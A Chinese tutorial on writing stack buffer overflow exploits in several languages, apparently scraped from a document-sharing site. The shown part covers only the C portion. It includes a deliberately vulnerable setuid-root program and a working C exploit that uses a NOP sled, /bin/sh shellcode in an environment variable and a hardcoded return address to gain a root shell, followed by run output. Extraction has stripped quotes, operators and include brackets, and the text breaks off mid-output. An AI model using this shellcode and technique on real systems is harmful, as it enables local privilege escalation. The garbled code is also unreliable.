溢出利用程序和编程语言大杂烩精选.docVIP

溢出利用程序和编程语言大杂烩溢出利用程序不仅仅是只能用c语言编写，其实几乎任何编程语言都能用来编写溢出利用程序，这里用Linux作为试验平台，以实例演示C、Perl、Shell、Awk语言编写溢出利用程序。之所以选择这几个语言是因为他们都几乎是Unix系统自带的语言（商用Unix系统中C语言例外）。示例中基本都是把SHELLCODE放到环境变量中来实现精确定位的。一??有溢出漏洞的vul.c[cloud@test]$ iduid=505(cloud) gid=503(test) groups=503(test)[cloud@test]$ cat vul.c/* Demo ?? Have a bof vul at argv[1].?? Write by watercloud @ xfocus.org */#includestdio.hint main(int argc,char??* argv[]){????????char buff[32];????????if(argc 1)????????{????????????????strcpy(buff,argv[1]);????????}????????printf(buff : %s\n,buff);????????return 0;}[cloud@test]$ gcc vul.c -o vul[cloud@test]$ ls -l vul-rwxr-xr-x????1 cloud????test??????11627??2月 24 10:14 vul[cloud@test]$ sudo chown root vul[cloud@test]$ sudo chmod u+s vul[cloud@test]$ ls -lh vul-rwsr-xr-x????1 root???? test????????11K??2月 24 10:14 vul二 C语言版本利用程序ex.c[cloud@test]$ cat ex.c/* Demo for exploit bof of ./vul ?? Write by watercloud @ xfocus.org */#include stdio.h#define TARGET ./vul#define ADDR 0xbffff3e8char SH[]=1\xc0PPP[YZ4\xd0\xcd\x80??????????j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80;int main(int argc,char * argv[]){????????char env_buff[4000];????????char cmd_buff[1024];????????int i,ret;????????unsigned int *pi;????????char * pc;????????for(i=0;i3096;env_buff[i++]=0x90){ };????????env_buff[i]=\0;????????strcat(env_buff,SH);????????setenv(KK,env_buff,1);????????strcpy(cmd_buff,TARGET);????????pc=cmd_buff[strlen(TARGET)];????????*pc++= ;????????for(ret=1,i=0;i4 ret;i++)????????{????????????????int j;????????????????*pc++=A;????????????????pi=(unsigned int *)pc;????????????????for(j=0;j20;*pi++=ADDR,j++){};????????????????*pi=0;????????????????ret=system(cmd_buff);????????}????????return ret;}[cloud@test]$ gcc ex.c -o ex[cloud@test]$ ./exbuff : A梵胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??梵胯??buff : AA梵胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??buff : AAA梵胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??buff : AAAA梵胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?